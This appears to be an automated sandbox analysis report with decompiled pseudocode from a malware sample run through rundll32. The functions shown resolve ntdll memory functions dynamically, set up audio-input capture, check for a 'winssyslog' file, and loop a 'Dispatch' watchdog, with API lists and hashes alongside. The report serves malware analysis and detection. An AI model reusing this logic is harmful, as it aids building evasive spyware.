                                                                                              				_v8 = __ecx;
                                                                                              				if(_t31 != 0 || _t33 != 0) {
                                                                                              					L7:
                                                                                              					_push(0);
                                                                                              					_push(0x40);
                                                                                              					_push(0);
                                                                                              					_push(0x3000);
                                                                                              					_v28 = _t23;
                                                                                              					asm("cdq");
                                                                                              					asm("xorps xmm0, xmm0");
                                                                                              					_push(_t28);
                                                                                              					_push( &_v28);
                                                                                              					_push(0);
                                                                                              					_push(0);
                                                                                              					asm("movlpd [ebp-0x10], xmm0");
                                                                                              					asm("cdq");
                                                                                              					_push(_t28);
                                                                                              					asm("cdq");
                                                                                              					_v24 = 0;
                                                                                              					_t24 = E042681B0(_t31, _t33, 6, _v8, _t28,  &_v20);
                                                                                              					if(_t24 != 0 || _t28 != 0) {
                                                                                              						_t13 =  *0x42a7b48;
                                                                                              						if(_t13 == 0) {
                                                                                              							L12:
                                                                                              							_t32 = GetModuleHandleW(L"ntdll.dll");
                                                                                              							 *0x42a7b48 = GetProcAddress(_t32, "RtlNtStatusToDosError");
                                                                                              							_t26 = GetProcAddress(_t32, "RtlSetLastWin32Error");
                                                                                              							_t13 =  *0x42a7b48;
                                                                                              							 *0x42a7b28 = _t26;
                                                                                              						} else {
                                                                                              							_t26 =  *0x42a7b28;
                                                                                              							if(_t26 == 0) {
                                                                                              								goto L12;
                                                                                              							}
                                                                                              						}
                                                                                              						if(_t13 != 0 && _t26 != 0) {
                                                                                              							RtlRestoreLastWin32Error( *_t13(_t24));
                                                                                              						}
                                                                                              						goto L16;
                                                                                              					} else {
                                                                                              						return _v20;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t21 =  *0x42a7b40; // 0x32050000
                                                                                              					_t28 =  *0x42a7b44; // 0x7ffc
                                                                                              					if(_t21 == 0 && _t28 == 0) {
                                                                                              						 *0x42a7b40 = E04268390(__ecx);
                                                                                              						 *0x42a7b44 = _t28;
                                                                                              					}
                                                                                              					_t31 = E04268B90(_t23, "NtAllocateVirtualMemory", _t28, _t31, _t33, _t21, _t28);
                                                                                              					_t35 = _t35 + 8;
                                                                                              					 *0x42a7b30 = _t31;
                                                                                              					_t33 = _t28;
                                                                                              					 *0x42a7b34 = _t33;
                                                                                              					if(_t31 != 0 || _t33 != 0) {
                                                                                              						goto L7;
                                                                                              					} else {
                                                                                              						L16:
                                                                                              						return 0;
                                                                                              					}
                                                                                              				}
                                                                                              			}




















                                                                                              0x04268c60
                                                                                              0x04268c68
                                                                                              0x04268c6e
                                                                                              0x04268c71
                                                                                              0x04268c77
                                                                                              0x04268c7c
                                                                                              0x04268cd0
                                                                                              0x04268cd0
                                                                                              0x04268cd2
                                                                                              0x04268cd4
                                                                                              0x04268cd6
                                                                                              0x04268cde
                                                                                              0x04268ce1
                                                                                              0x04268ce2
                                                                                              0x04268ce5
                                                                                              0x04268ce6
                                                                                              0x04268ce7
                                                                                              0x04268ce9
                                                                                              0x04268cee
                                                                                              0x04268cf3
                                                                                              0x04268cf4
                                                                                              0x04268cf9
                                                                                              0x04268d00
                                                                                              0x04268d0c
                                                                                              0x04268d13
                                                                                              0x04268d26
                                                                                              0x04268d2d
                                                                                              0x04268d39
                                                                                              0x04268d4a
                                                                                              0x04268d5a
                                                                                              0x04268d61
                                                                                              0x04268d63
                                                                                              0x04268d68
                                                                                              0x04268d2f
                                                                                              0x04268d2f
                                                                                              0x04268d37
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04268d37
                                                                                              0x04268d70
                                                                                              0x04268d7a
                                                                                              0x04268d7a
                                                                                              0x00000000
                                                                                              0x04268d19
                                                                                              0x04268d25
                                                                                              0x04268d25
                                                                                              0x04268c82
                                                                                              0x04268c82
                                                                                              0x04268c87
                                                                                              0x04268c8f
                                                                                              0x04268c9a
                                                                                              0x04268c9f
                                                                                              0x04268c9f
                                                                                              0x04268cb1
                                                                                              0x04268cb3
                                                                                              0x04268cb6
                                                                                              0x04268cbc
                                                                                              0x04268cbe
                                                                                              0x04268cc6
                                                                                              0x00000000
                                                                                              0x04268d82
                                                                                              0x04268d82
                                                                                              0x04268d8a
                                                                                              0x04268d8a
                                                                                              0x04268cc6

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,?,?,?,74CB57B0,00000000,0426BFF5), ref: 04268D3E
                                                                                              • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04268D52
                                                                                              • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04268D5F
                                                                                              • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04268D7A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                                                              • String ID: NtAllocateVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                              • API String ID: 3496116238-3017390355
                                                                                              • Opcode ID: ca49903e36e2203d0a0a86d01bfd067f369fef488f0e5ea49c1de9d93d251397
                                                                                              • Instruction ID: 9e7f257f750c138bbcbb64ef613678f60fcad761289c93f416b6ff7eee446d17
                                                                                              • Opcode Fuzzy Hash: ca49903e36e2203d0a0a86d01bfd067f369fef488f0e5ea49c1de9d93d251397
                                                                                              • Instruction Fuzzy Hash: 5831E0F4F12306ABEB10EE6DAD44B7BB7A9EBD4710F140469ED05E3240E774EC9486A4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 64%
                                                                                              			E04268D90(intOrPtr __ecx, intOrPtr __edx, char _a4, intOrPtr _a8) {
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _v16;
                                                                                              				char _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				char _v28;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr* _t18;
                                                                                              				intOrPtr _t28;
                                                                                              				void* _t29;
                                                                                              				_Unknown_base(*)()* _t31;
                                                                                              				intOrPtr _t33;
                                                                                              				intOrPtr _t34;
                                                                                              				struct HINSTANCE__* _t35;
                                                                                              				intOrPtr _t36;
                                                                                              				void* _t38;
                                                                                              
                                                                                              				_t33 = __edx;
                                                                                              				_t36 =  *0x42a7b24; // 0x7ffc
                                                                                              				_t28 = __edx;
                                                                                              				_t34 =  *0x42a7b20; // 0x320ea340
                                                                                              				_v8 = __ecx;
                                                                                              				if(_t34 != 0 || _t36 != 0) {
                                                                                              					L7:
                                                                                              					_v28 = _a4;
                                                                                              					_push(0);
                                                                                              					_v24 = _a8;
                                                                                              					_push(0x4000);
                                                                                              					asm("cdq");
                                                                                              					_push(_t33);
                                                                                              					_push( &_v20);
                                                                                              					_v20 = _t28;
                                                                                              					asm("cdq");
                                                                                              					_push(_t33);
                                                                                              					asm("cdq");
                                                                                              					_v16 = 0;
                                                                                              					_t29 = E042681B0(_t34, _t36, 4, _v8, _t33,  &_v28);
                                                                                              					if(_t29 != 0 || _t33 != 0) {
                                                                                              						_t18 =  *0x42a7b48;
                                                                                              						if(_t18 == 0) {
                                                                                              							L12:
                                                                                              							_t35 = GetModuleHandleW(L"ntdll.dll");
                                                                                              							 *0x42a7b48 = GetProcAddress(_t35, "RtlNtStatusToDosError");
                                                                                              							_t31 = GetProcAddress(_t35, "RtlSetLastWin32Error");
                                                                                              							_t18 =  *0x42a7b48;
                                                                                              							 *0x42a7b28 = _t31;
                                                                                              						} else {
                                                                                              							_t31 =  *0x42a7b28;
                                                                                              							if(_t31 == 0) {
                                                                                              								goto L12;
                                                                                              							}
                                                                                              						}
                                                                                              						if(_t18 != 0 && _t31 != 0) {
                                                                                              							RtlRestoreLastWin32Error( *_t18(_t29));
                                                                                              						}
                                                                                              						goto L16;
                                                                                              					} else {
                                                                                              						_t11 = _t29 + 1; // 0x1
                                                                                              						return _t11;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t26 =  *0x42a7b40; // 0x32050000
                                                                                              					_t33 =  *0x42a7b44; // 0x7ffc
                                                                                              					if(_t26 == 0 && _t33 == 0) {
                                                                                              						 *0x42a7b40 = E04268390(__ecx);
                                                                                              						 *0x42a7b44 = _t33;
                                                                                              					}
                                                                                              					_t34 = E04268B90(_t28, "NtFreeVirtualMemory", _t33, _t34, _t36, _t26, _t33);
                                                                                              					_t38 = _t38 + 8;
                                                                                              					 *0x42a7b20 = _t34;
                                                                                              					_t36 = _t33;
                                                                                              					 *0x42a7b24 = _t36;
                                                                                              					if(_t34 != 0 || _t36 != 0) {
                                                                                              						goto L7;
                                                                                              					} else {
                                                                                              						L16:
                                                                                              						return 0;
                                                                                              					}
                                                                                              				}
                                                                                              			}




















                                                                                              0x04268d90
                                                                                              0x04268d98
                                                                                              0x04268d9e
                                                                                              0x04268da1
                                                                                              0x04268da7
                                                                                              0x04268dac
                                                                                              0x04268e00
                                                                                              0x04268e03
                                                                                              0x04268e09
                                                                                              0x04268e0b
                                                                                              0x04268e11
                                                                                              0x04268e16
                                                                                              0x04268e17
                                                                                              0x04268e18
                                                                                              0x04268e1c
                                                                                              0x04268e1f
                                                                                              0x04268e20
                                                                                              0x04268e25
                                                                                              0x04268e2c
                                                                                              0x04268e38
                                                                                              0x04268e3f
                                                                                              0x04268e4f
                                                                                              0x04268e56
                                                                                              0x04268e62
                                                                                              0x04268e73
                                                                                              0x04268e83
                                                                                              0x04268e8a
                                                                                              0x04268e8c
                                                                                              0x04268e91
                                                                                              0x04268e58
                                                                                              0x04268e58
                                                                                              0x04268e60
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04268e60
                                                                                              0x04268e99
                                                                                              0x04268ea3
                                                                                              0x04268ea3
                                                                                              0x00000000
                                                                                              0x04268e45
                                                                                              0x04268e45
                                                                                              0x04268e4e
                                                                                              0x04268e4e
                                                                                              0x04268db2
                                                                                              0x04268db2
                                                                                              0x04268db7
                                                                                              0x04268dbf
                                                                                              0x04268dca
                                                                                              0x04268dcf
                                                                                              0x04268dcf
                                                                                              0x04268de1
                                                                                              0x04268de3
                                                                                              0x04268de6
                                                                                              0x04268dec
                                                                                              0x04268dee
                                                                                              0x04268df6
                                                                                              0x00000000
                                                                                              0x04268eab
                                                                                              0x04268eab
                                                                                              0x04268eb1
                                                                                              0x04268eb1
                                                                                              0x04268df6

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,00000000,00000000,0426BFF5,?,?,04269227), ref: 04268E67
                                                                                              • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 04268E7B
                                                                                              • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error), ref: 04268E88
                                                                                              • RtlRestoreLastWin32Error.NTDLL(00000000), ref: 04268EA3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$ErrorHandleLastModuleRestoreWin32
                                                                                              • String ID: NtFreeVirtualMemory$RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                                              • API String ID: 3496116238-2303597063
                                                                                              • Opcode ID: 2c631dc44241ed7e548f78418b25b720b9877c30d8abad955bd772a664a4fddb
                                                                                              • Instruction ID: d810aaf3632203d3c18efbb71d9b3d1449bbfd49737473ae079a9039b437e14b
                                                                                              • Opcode Fuzzy Hash: 2c631dc44241ed7e548f78418b25b720b9877c30d8abad955bd772a664a4fddb
                                                                                              • Instruction Fuzzy Hash: 3B3192B5F122069BDB10EE59E944BAAB7F9EBD8720B004429ED05D3200E774EC548BE4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 67%
                                                                                              			E04252000(intOrPtr* __ecx, intOrPtr _a4, char _a7) {
                                                                                              				void* _v12;
                                                                                              				char _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				char _v24;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t18;
                                                                                              				intOrPtr _t23;
                                                                                              				intOrPtr _t29;
                                                                                              				intOrPtr* _t33;
                                                                                              				void* _t36;
                                                                                              
                                                                                              				_t18 = _a4;
                                                                                              				_t33 = __ecx;
                                                                                              				 *__ecx = 0x429e8b0;
                                                                                              				 *((intOrPtr*)(__ecx + 4)) = _t18;
                                                                                              				 *((intOrPtr*)(_t18 + 0x38)) = __ecx;
                                                                                              				 *(_t33 + 8) = CreateEventW(0, 1, 0, 0);
                                                                                              				 *_t33 = 0x429d858;
                                                                                              				if(waveInGetNumDevs() != 0) {
                                                                                              					_t47 =  *0x42a78c8;
                                                                                              					if( *0x42a78c8 == 0) {
                                                                                              						_t36 = E04275B14(CreateEventW, _t47, 0x5c);
                                                                                              						_t23 = E04251190(_t36, _t47);
                                                                                              						_push(_t36);
                                                                                              						_push(0x3f);
                                                                                              						 *((intOrPtr*)(_t33 + 0xc)) = _t23;
                                                                                              						_push(1);
                                                                                              						_push( &_a7);
                                                                                              						 *0x42a78c8 = 1;
                                                                                              						_a7 = 0x7c;
                                                                                              						E04251C60( *((intOrPtr*)(_t33 + 4)));
                                                                                              						WaitForSingleObject( *(_t33 + 8), 0xffffffff);
                                                                                              						Sleep(0x96);
                                                                                              						_v24 = E04252220;
                                                                                              						_v20 = _t33;
                                                                                              						_v16 = 0;
                                                                                              						_v12 = CreateEventW(0, 0, 0, 0);
                                                                                              						_t29 = E0427F897( *((intOrPtr*)(_t33 + 4)), 0, 0, E04265400,  &_v24, 0, 0);
                                                                                              						WaitForSingleObject(_v12, 0xffffffff);
                                                                                              						CloseHandle(_v12);
                                                                                              						 *((intOrPtr*)(_t33 + 0x10)) = _t29;
                                                                                              					}
                                                                                              				}
                                                                                              				return _t33;
                                                                                              			}













                                                                                              0x04252003
                                                                                              0x04252011
                                                                                              0x04252019
                                                                                              0x0425201f
                                                                                              0x04252024
                                                                                              0x04252029
                                                                                              0x0425202c
                                                                                              0x0425203a
                                                                                              0x04252040
                                                                                              0x04252047
                                                                                              0x04252057
                                                                                              0x04252059
                                                                                              0x0425205e
                                                                                              0x04252062
                                                                                              0x04252064
                                                                                              0x0425206a
                                                                                              0x0425206c
                                                                                              0x0425206d
                                                                                              0x04252074
                                                                                              0x04252078
                                                                                              0x04252082
                                                                                              0x0425208d
                                                                                              0x0425209b
                                                                                              0x042520a2
                                                                                              0x042520a5
                                                                                              0x042520af
                                                                                              0x042520bf
                                                                                              0x042520ce
                                                                                              0x042520d7
                                                                                              0x042520dd
                                                                                              0x042520dd
                                                                                              0x04252047
                                                                                              0x042520e7

                                                                                              APIs
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04252027
                                                                                              • waveInGetNumDevs.WINMM ref: 04252032
                                                                                                • Part of subcall function 04251190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74D0F5E0,?,0425205E), ref: 042511A9
                                                                                                • Part of subcall function 04251190: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,74D0F5E0,?,0425205E), ref: 042511B6
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000001,0000003F), ref: 04252082
                                                                                              • Sleep.KERNEL32(00000096), ref: 0425208D
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 042520A9
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 042520CE
                                                                                              • CloseHandle.KERNEL32(?), ref: 042520D7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CreateEvent$ObjectSingleWait$CloseDevsHandleSleepwave
                                                                                              • String ID: |
                                                                                              • API String ID: 1906678132-2343686810
                                                                                              • Opcode ID: d63f857d12f0428d5ba6b73aacbebdca5cf1dc1e3a44a9ecd1d763ed466bf62b
                                                                                              • Instruction ID: 39c8b5dff37b991d343b6aebdaedb57c9897d364fbce9ae2cdd375a862250eea
                                                                                              • Opcode Fuzzy Hash: d63f857d12f0428d5ba6b73aacbebdca5cf1dc1e3a44a9ecd1d763ed466bf62b
                                                                                              • Instruction Fuzzy Hash: F621BB71B54304BFFB10AFA8EC45B5A7FA4EB04714F144199F904AE2C1DBB5AD40CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 81%
                                                                                              			E042599B0() {
                                                                                              				signed int _v8;
                                                                                              				short _v528;
                                                                                              				signed int _t9;
                                                                                              				signed int _t13;
                                                                                              				signed int _t14;
                                                                                              				void* _t16;
                                                                                              				void* _t20;
                                                                                              				void* _t22;
                                                                                              				void* _t23;
                                                                                              				void* _t26;
                                                                                              				void* _t27;
                                                                                              				void* _t28;
                                                                                              				signed int _t30;
                                                                                              
                                                                                              				_t9 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t9 ^ _t30;
                                                                                              				_push(_t22);
                                                                                              				_push(_t28);
                                                                                              				_push(_t26);
                                                                                              				_push(0);
                                                                                              				_t24 = L"winssyslog";
                                                                                              				E04266370(_t22, L"winssyslog",  &_v528, _t26, _t28, 8);
                                                                                              				_t13 = GetFileAttributesW( &_v528);
                                                                                              				_t27 = CloseHandle;
                                                                                              				_t23 = UnmapViewOfFile;
                                                                                              				_t14 = _t13 & 0xffffff00 | _t13 != 0xffffffff;
                                                                                              				 *0x42a78c9 = _t14;
                                                                                              				L1:
                                                                                              				while(1) {
                                                                                              					if(_t14 != 0) {
                                                                                              						L4:
                                                                                              						E0425B600(_t23, _t24, _t27, _t36);
                                                                                              						_t14 =  *0x42a78c9; // 0x0
                                                                                              						if(_t14 != 1) {
                                                                                              							L7:
                                                                                              							_t24 =  *0x42a7adc; // 0x0
                                                                                              							if(_t24 != 0) {
                                                                                              								_t16 =  *(_t24 + 4);
                                                                                              								if(_t16 != 0) {
                                                                                              									TerminateThread(_t16, 0xffffffff);
                                                                                              									_t20 =  *0x42a7adc; // 0x0
                                                                                              									CloseHandle( *(_t20 + 4));
                                                                                              									_t24 =  *0x42a7adc; // 0x0
                                                                                              									 *(_t24 + 4) = 0;
                                                                                              								}
                                                                                              								UnmapViewOfFile(_t24);
                                                                                              								CloseHandle( *0x42a7ad8);
                                                                                              								_t14 =  *0x42a78c9; // 0x0
                                                                                              								 *0x42a7adc = 0;
                                                                                              							}
                                                                                              							continue;
                                                                                              						}
                                                                                              						do {
                                                                                              							Sleep(0x64);
                                                                                              							_t14 =  *0x42a78c9; // 0x0
                                                                                              						} while (_t14 == 1);
                                                                                              						goto L7;
                                                                                              					} else {
                                                                                              						do {
                                                                                              							Sleep(0x64);
                                                                                              							_t36 =  *0x42a78c9;
                                                                                              						} while ( *0x42a78c9 == 0);
                                                                                              						goto L4;
                                                                                              					}
                                                                                              				}
                                                                                              			}
















                                                                                              0x042599b9
                                                                                              0x042599c0
                                                                                              0x042599c3
                                                                                              0x042599c4
                                                                                              0x042599c5
                                                                                              0x042599c6
                                                                                              0x042599d0
                                                                                              0x042599d5
                                                                                              0x042599e4
                                                                                              0x042599f3
                                                                                              0x042599f9
                                                                                              0x042599ff
                                                                                              0x04259a02
                                                                                              0x00000000
                                                                                              0x04259a07
                                                                                              0x04259a09
                                                                                              0x04259a1d
                                                                                              0x04259a1d
                                                                                              0x04259a22
                                                                                              0x04259a29
                                                                                              0x04259a3d
                                                                                              0x04259a3d
                                                                                              0x04259a45
                                                                                              0x04259a47
                                                                                              0x04259a4c
                                                                                              0x04259a51
                                                                                              0x04259a57
                                                                                              0x04259a5f
                                                                                              0x04259a61
                                                                                              0x04259a67
                                                                                              0x04259a67
                                                                                              0x04259a6f
                                                                                              0x04259a77
                                                                                              0x04259a79
                                                                                              0x04259a7e
                                                                                              0x04259a7e
                                                                                              0x00000000
                                                                                              0x04259a45
                                                                                              0x04259a30
                                                                                              0x04259a32
                                                                                              0x04259a34
                                                                                              0x04259a39
                                                                                              0x00000000
                                                                                              0x04259a10
                                                                                              0x04259a10
                                                                                              0x04259a12
                                                                                              0x04259a14
                                                                                              0x04259a14
                                                                                              0x00000000
                                                                                              0x04259a10
                                                                                              0x04259a09

                                                                                              APIs
                                                                                                • Part of subcall function 04266370: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04266396
                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 042599E4
                                                                                              • Sleep.KERNEL32(00000064), ref: 04259A12
                                                                                              • Sleep.KERNEL32(00000064), ref: 04259A32
                                                                                              • TerminateThread.KERNEL32(?,000000FF), ref: 04259A51
                                                                                              • CloseHandle.KERNEL32(?), ref: 04259A5F
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 04259A6F
                                                                                              • CloseHandle.KERNEL32 ref: 04259A77
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseFileHandleSleep$AttributesDirectorySystemTerminateThreadUnmapView
                                                                                              • String ID: winssyslog
                                                                                              • API String ID: 3677296445-1874786851
                                                                                              • Opcode ID: 78e227272a1f4177f412f342f9a8f009828cced7a7026fd7e878c9a4133722a5
                                                                                              • Instruction ID: 3464b379a401241671580be77ea0a3c86223e3c70dad6559e02168ec05c7be80
                                                                                              • Opcode Fuzzy Hash: 78e227272a1f4177f412f342f9a8f009828cced7a7026fd7e878c9a4133722a5
                                                                                              • Instruction Fuzzy Hash: 6C21C075B10245AFD710AF6CFC0CB24BBA5EB45314F584188EC5097292CB38EC52DF68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 95%
                                                                                              			E04257980(intOrPtr* __ecx) {
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				_Unknown_base(*)()* _t15;
                                                                                              				_Unknown_base(*)()* _t16;
                                                                                              				_Unknown_base(*)()* _t17;
                                                                                              				void* _t21;
                                                                                              				intOrPtr _t22;
                                                                                              				struct HINSTANCE__* _t24;
                                                                                              				intOrPtr* _t26;
                                                                                              				intOrPtr* _t27;
                                                                                              
                                                                                              				_t25 = __ecx;
                                                                                              				_t27 = __ecx;
                                                                                              				_t1 = _t27 + 0x10; // 0x10
                                                                                              				_t26 = _t1;
                                                                                              				 *_t26 = 0;
                                                                                              				 *__ecx = 0;
                                                                                              				 *((intOrPtr*)(__ecx + 0x14)) = 0;
                                                                                              				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
                                                                                              				 *((short*)(__ecx + 0x18)) = 2;
                                                                                              				_t24 = LoadLibraryA("ntdll.dll");
                                                                                              				if(_t24 != 0) {
                                                                                              					_t15 = GetProcAddress(_t24, "RtlGetCompressionWorkSpaceSize");
                                                                                              					 *(_t27 + 4) = _t15;
                                                                                              					if(_t15 != 0) {
                                                                                              						_t16 = GetProcAddress(_t24, "RtlCompressBuffer");
                                                                                              						 *(_t27 + 8) = _t16;
                                                                                              						if(_t16 != 0) {
                                                                                              							_t17 = GetProcAddress(_t24, "RtlDecompressBuffer");
                                                                                              							 *(_t27 + 0xc) = _t17;
                                                                                              							if(_t17 != 0) {
                                                                                              								_t8 = _t27 + 0x14; // 0x14
                                                                                              								_t21 =  *( *(_t27 + 4))( *(_t27 + 0x18) & 0x0000ffff, _t26, _t8);
                                                                                              								_t35 = _t21;
                                                                                              								if(_t21 == 0) {
                                                                                              									_push( *_t26);
                                                                                              									_t22 = E04275B55(_t25, _t27, _t35);
                                                                                              									 *((intOrPtr*)(_t27 + 0x1c)) = _t22;
                                                                                              									if(_t22 != 0) {
                                                                                              										E0427DEA0(_t26, _t22, 0,  *_t26);
                                                                                              										 *_t27 = 1;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				return _t27;
                                                                                              			}













                                                                                              0x04257980
                                                                                              0x04257982
                                                                                              0x0425798a
                                                                                              0x0425798a
                                                                                              0x0425798d
                                                                                              0x04257998
                                                                                              0x0425799e
                                                                                              0x042579a5
                                                                                              0x042579ac
                                                                                              0x042579b6
                                                                                              0x042579ba
                                                                                              0x042579c2
                                                                                              0x042579c8
                                                                                              0x042579cd
                                                                                              0x042579d5
                                                                                              0x042579db
                                                                                              0x042579e0
                                                                                              0x042579e8
                                                                                              0x042579ee
                                                                                              0x042579f3
                                                                                              0x042579f5
                                                                                              0x04257a02
                                                                                              0x04257a04
                                                                                              0x04257a06
                                                                                              0x04257a08
                                                                                              0x04257a0a
                                                                                              0x04257a12
                                                                                              0x04257a17
                                                                                              0x04257a1e
                                                                                              0x04257a26
                                                                                              0x04257a26
                                                                                              0x04257a17
                                                                                              0x04257a06
                                                                                              0x042579f3
                                                                                              0x042579e0
                                                                                              0x042579cd
                                                                                              0x04257a31

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,0426B836), ref: 042579B0
                                                                                              • GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 042579C2
                                                                                              • GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 042579D5
                                                                                              • GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 042579E8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                              • String ID: RtlCompressBuffer$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize$ntdll.dll
                                                                                              • API String ID: 2238633743-2202537490
                                                                                              • Opcode ID: 04cbb9668a61105e8b000a478bdd17db72dbae2a885f8ce4591c128fd6d031d2
                                                                                              • Instruction ID: 23c2354898f0baafb9d28e7ab2fbc58c8c89eca3356e7a981e17a12bb31942b3
                                                                                              • Opcode Fuzzy Hash: 04cbb9668a61105e8b000a478bdd17db72dbae2a885f8ce4591c128fd6d031d2
                                                                                              • Instruction Fuzzy Hash: 0C112BB4720703ABE730AF79EC45B53BBE8EF58704F200829E842D2651EB74F9448B54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0426C0A0() {
                                                                                              				long _t1;
                                                                                              				void* _t9;
                                                                                              				void* _t13;
                                                                                              				void* _t14;
                                                                                              
                                                                                              				_t9 = WaitForSingleObject;
                                                                                              				_t14 = Sleep;
                                                                                              				L1:
                                                                                              				_t10 = L"Dispatch";
                                                                                              				_t1 = E042694D0(_t9, L"Dispatch", _t13, _t14, _t15);
                                                                                              				_t15 = _t1;
                                                                                              				if(_t1 != 0) {
                                                                                              					__eflags = _t1 - 0x2fffffff;
                                                                                              					if(__eflags != 0) {
                                                                                              						_t13 = OpenThread(0x1fffff, 0, _t1);
                                                                                              						__eflags = _t13;
                                                                                              						if(__eflags != 0) {
                                                                                              							WaitForSingleObject(_t13, 0xffffffff);
                                                                                              							CloseHandle(_t13);
                                                                                              						}
                                                                                              						E0426C020(_t10, _t14, __eflags);
                                                                                              						Sleep(0x3e8);
                                                                                              					} else {
                                                                                              						Sleep(0x7d0);
                                                                                              						E042578B0(_t9, L"Dispatch", 0, _t13, _t14, __eflags);
                                                                                              						E0426C020(L"Dispatch", _t14, __eflags);
                                                                                              						Sleep(0x3e8);
                                                                                              					}
                                                                                              				} else {
                                                                                              					E0426C020(L"Dispatch", _t14, _t15);
                                                                                              					Sleep(0x3e8);
                                                                                              				}
                                                                                              				goto L1;
                                                                                              			}







                                                                                              0x0426c0a1
                                                                                              0x0426c0a8
                                                                                              0x0426c0b0
                                                                                              0x0426c0b0
                                                                                              0x0426c0b5
                                                                                              0x0426c0ba
                                                                                              0x0426c0bc
                                                                                              0x0426c0cc
                                                                                              0x0426c0d1
                                                                                              0x0426c102
                                                                                              0x0426c104
                                                                                              0x0426c106
                                                                                              0x0426c10b
                                                                                              0x0426c10e
                                                                                              0x0426c10e
                                                                                              0x0426c114
                                                                                              0x0426c11e
                                                                                              0x0426c0d3
                                                                                              0x0426c0d8
                                                                                              0x0426c0e1
